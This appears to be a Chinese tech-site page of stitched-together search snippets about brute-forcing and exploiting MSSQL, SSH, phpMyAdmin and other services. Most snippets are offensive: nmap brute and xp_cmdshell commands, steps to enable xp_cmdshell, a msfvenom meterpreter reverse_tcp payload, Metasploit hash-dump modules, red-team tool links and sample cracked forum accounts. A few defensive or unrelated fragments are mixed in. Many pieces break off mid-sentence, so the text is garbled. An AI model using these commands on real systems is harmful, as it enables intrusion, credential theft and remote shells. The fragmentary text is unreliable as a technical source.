你 · 的 渗透必备工具 工具清单 无聊的我又来水文了,今天的是爆破cobalt strike密码脚本,最近活脱脱成了一个GITHUB的安(搬)利(运)管(工)。
哈哈哈,加油~感谢D牛还有老板的宽容和建议,让我小小的任性了下~~ 明天再发sunny girl scan,今天先发这个zip爆破的脚本。C牛对我提出了建议,我打算改一下在发。
创建黑名单文件: touch /etc/black.txt 创建防爆破脚本: cat /etc/secure_ssh.sh #!...fi fi done EOF 添加到定时任务计划: echo "* * * * * sh /etc/secure_ssh.sh" >> /etc/crontab 赋值脚本权限
CentOS 7方式 黑名单IP touch /etc/black.txt SSH 防爆破脚本 vim /etc/secure_ssh.sh #!...checkBlackIp.sh chmod 755 /script/checkBlackIp.sh /script chown root:root /script/checkBlackIp.sh 创建脚本
晚上花了1小时重写了MSSQL数据库中的分页存储过程,采用ROW_NUMBER的方式,需要MSSQL2005及以上版本支持。...为什么这么做,有两点: 第一:因为一直觉得采用TOP嵌套的方式太落后,尽管在程序中已经支持自定义View的方式读取分页,但是如果是单表的读取还是走存储过程,现在都MSSQL 2016了,MSSQL都支持...完整MSSQL分页存储过程sql脚本如下,拿去不谢。 /****** Object: StoredProcedure [dbo].
0x01 前言 YX'blog地址www.535yx.cn 本人最近在学习利用python写脚本,所以写下这篇文章与大家共同进步。 #这篇文章已由本人发自吐司,禁止他人转发文章。...大家有能力可以去申请一个号,安全气氛浓厚 0x02 正文 本次脚本所调用的第三方库有 import requests,time 下面是ua头 headers = {'content-type': 'application...print('error') except Exception as result: time.sleep(0.1) 这样批量爆破...3312端口的脚本就成功写完了(原来想写个多线程爆破,但是我发现速度太快易被banIP)。...0x03结尾 本脚本仅用于学习讨论,不用于其他任何非法操作!!!该教程所测试的网站皆为个人网站,切勿非法使用!
0×04 和smtp,pop3,imap相关的一些扫描脚本 smtp-brute.nse 简单爆破smtp弱口令,拿这个爆进去的邮箱给人发信也许成功率会稍微高一点 # nmap -p 25 --script...0×06 和各种数据库相关的一些扫描脚本 informix-brute.nse informix爆破脚本 # nmap -p 9088 --script informix-brute.nse 192.168.3.23...扫描mssql sa空密码,比如你想批量抓mssql # nmap -p 1433 --script ms-sql-empty-password.nse -v 192.168.3.0/24 ms-sql-brute.nse...,远程执行系统命令 # nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa...vps带宽再小点儿的话,这个就没什么谱了,毕竟我们是在公网,不是在内网,所以,还是建议最好不要同时加载很多个弱口令爆破脚本,如果实在没办法必须爆破,可以多花点儿时间,去搜集目标有价值的用户名,以此尽可能提高自己的命中率
Slocalhost –Usa –Pfoobar 'S'参数为执行查询的服务器,'U'参数为用户名,'P'参数为密码,这里为'foobar' SQL SERVER中提供了几个内置的允许创建ActiveX自动执行脚本的存储过程...这些脚本和运行在windows脚本解释器下的脚本,或者ASP脚本程序一样——他们使用VBScript或JavaScript书写,他们创建自动执行对象并和它们交互。...一个自动执行脚本使用这种方法书写可以在Transact-SQL中做任何在ASP脚本中,或者WSH脚本中可以做的任何事情 使用'wscript.shell'对象建立了一个记事本的实例: declare
图2展示了“WannaMine”使用的payload,payload最终在目标计算机上执行PowerShell脚本,可见现阶段的攻击只对Windows服务器奏效。 ?...图2 僵尸程序中配置两个未开启的爆破模块,目标为**MSSQL和PHPMyAdmin** 在对“WannaMine”新版本僵尸程序的分析中我们发现其配置了针对MSSQL和PHPMyAdmin爆破模块。...这两个模块使用内置的字典对MSSQL和PHPMyAdmin数据库进行弱口令爆破。...对MSSQL爆破成功后,将在MSSQL中执行PowerShell命令;对PHPMyAdmin爆破成功后,向C&C发送使用的帐号和密码。图3展示了爆破MSSQL成功后所执行的命令。 ?...表1 命令 功能 CMD 执行**Command** ScreenShot 屏幕截图 CrackMSSQL MSSQL**扫描与爆破** CrackWeblogic WebLogic**漏洞攻击** PMAFind
<?php set_time_limit(0); $host=explode("n",@$_POST['host']); $name=explode("n",@...
工具简介 一款用Go语言编写的数据库自动化提权工具,支持Mysql、MSSQL、Postgresql、Oracle、Redis数据库提权、命令执行、爆破以及ssh连接等等功能。...5. mssql crack .........console 使用交互式shell -console2 sp_oacreate使用exec直接回显 -crack 爆破参数... 使用dbms_xmlquery_newcontext执行命令(dbms_export_extension存在漏洞前提下) -e string webshell脚本类型...-mssql 存在该参数表示连接mssql数据库 -mysql Mysql数据库 -oracle 选择
菜刀(绝逼右后门的),访问了两个,确实存在的 dz爆破--用于爆破discuz论坛程序存在的用户名密码的工具,先遍历uid(没记错吧)0-N然后获取每个id的用户名再去挨个爆破,下图就是这个程序 ?...来看看他的爆破结果 Url:http://www.xiazy.net/ User:q198046马赛克 Pass:a123456Url:http://www.xiazy.net/ User:kk马赛克...多线程批量破解--phpmyadmin批量爆破的 ? 去重复--肯定是数据去重复的了.. 弱口令利用--phpmyadmin弱口令利用工具,直接写shell ? ?...密码可更改 2018/8/16 22:49:36 需要密码 Yes 用户可以更改密码 Yes 允许的工作站 All 登录脚本...,爆破后利用工具B进行写webshell,猜测木马是手工种的,很有可能在被入侵服务器上运行了那个类似挂机宝的程序,目前该黑客一爆破出近千个弱口令账户,危害极大 注意:以上的QQ或者或者手机号码信息可能不准确
用burpsuit对网页上的一些用户名密码之类的爆破 这里就用墨者学院文件包含那道题的那个登录页面吧… ? 设置代理 先用burp抓取 ? 黑色圈住的就是用户名和密码的函数(应该是叫函数吧…..)...这里他实现标记了要爆破的位置 不是我们要爆破的位置 我们先用上边的clear把标记清除 ? 然后选中要爆破的地址 这里都是admin前边那个是我输入的账号后边的是密码 然后点击add分别添加 ?
MSSQL MSSQL和MySQL注入类似,但在数据结构特定函数名称上存在差异。...且MSSQL与Windows平台的高契合度,使其可以使用Windows身份验证,导致其运行权限较高,若没有对权限进行限制,当存在SQL注入时,所造成的后果一般比MySQL更严重。...select is_srvrolemember('public') select is_srvrolemember('sysadmin') select @@SERVERNAME Sysobjects MSSQL...类型简称 含义 U 用户定义的表 V 视图 P 存储过程 X 扩展存储过程 limit和top limit语法是MySQL自带的一个特性,而在MSSQL中并没有这个特性。...如果要在MSSQL中实现相似的功能,可以使用top -- 查询前1条数据 select top 1 name from master..sysdatabases -- 查询前2条数据 select top
table Get-SQLQuery -Instance -Query "USE Employees;SELECT * FROM ITEmployees" 枚举 SPN / 查找 MSSQL...powershell –e " -Verbose -Subsystem CmdExec -Subsystem VBScript -Subsystem Jscript 其他脚本...-Password -Instance -Verbose https://hideandsec.sh/books/cheatsheets-82c/page/mssql
ctfshow爆破真题 web21 打开之后发现有一个登录框,随便输入一个,抓包 发现用户名和密码是base64加密的 send to intruder开始爆破 加载题目给的字典,题目给的是后缀
Metasploit爆破篇 爆破TELNET msf > use auxiliary/scanner/telnet/telnet_login msf auxiliary(telnet_login) >...,在scripts/meterpreter目录下可查看所有的脚本名。...,对于此类的web脚本触发执行方法非常简单,直接在url中访问该脚本即可 php 脚本 msfvenom --platform PHP -p php/meterpreter/reverse_tcp LHOST.../下的模块探测SQL server的信息 auxiliary/scanner/mssql/mssql_hashdump #dump密码hash auxiliary/scanner/mssql/mssql_login...#密码爆破 auxiliary/scanner/mssql/mssql_ping #嗅探 auxiliary/scanner/mssql/mssql_schemadump SNMP扫描
fastfinder Fvuln 专门编写的一款自动化工具,主要适用于日常安全服务、渗透测试人员和RedTeam红队人员,它集合的功能包括:存活IP探测、开放端口探测、web服务探测、web漏洞扫描、smb爆破...、ssh爆破、ftp爆破、mssql爆破等其他数据库爆破工作以及大量web漏洞检测模块 地址:https://github.com/d3ckx1/Fvuln AnonymousSMBServer 一个能快速开启和关闭匿名...SMB共享的红队脚本 地址:https://github.com/NyDubh3/AnonymousSMBServer Apktool 逆向工程Android apk文件的工具 地址:https:/
options',1 reconfigure go sp_configure 'xp_cmdshell',1 reconfigure go 执行 exec xp_cmdshell "whoami" //在mssql...沙盒执行 需要当前mssql用户有写注册表权限 开启 exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure...microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")') 在默认安装mssql...Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs //主意.net版本 得到的DLL上传到目标,设置dll文件权限,否则mssql...,在mssql里查询 ?
这篇博客文章介绍了如何通过MSSQL CLR自动执行横向移动,而无需接触磁盘*或不需要XP_CMDSHELL,以及如何防止和检测到这种情况。...为实现命令执行而对MSSQL服务进行后期开发通常会利用XP_CMDSHELL存储过程在MSSQL进程的上下文中运行操作系统命令。...SQL Server CLR集成 SQL Server 2005中引入了从MSSQL运行.NET代码的功能,并在后续版本中叠加了各种保护措施,以限制代码可以访问的内容。...ASSEMBLY SQLCLRTest FROM 'C:\MyDBApp\SQLCLRTest.dll' WITH PERMISSION_SET = SAFE; 权限集的三个选项是: 安全:本质上,这仅将MSSQL...为了简化CLR代码的创建和调用,制作了执行以下操作的GUI应用程序: 收集连接字符串数据 从原始二进制文件和单字节XOR读取Shellcode字节 生成一个MSSQL CLR DLL,该DLL对shellcode
领取专属 10元无门槛券
手把手带您无忧上云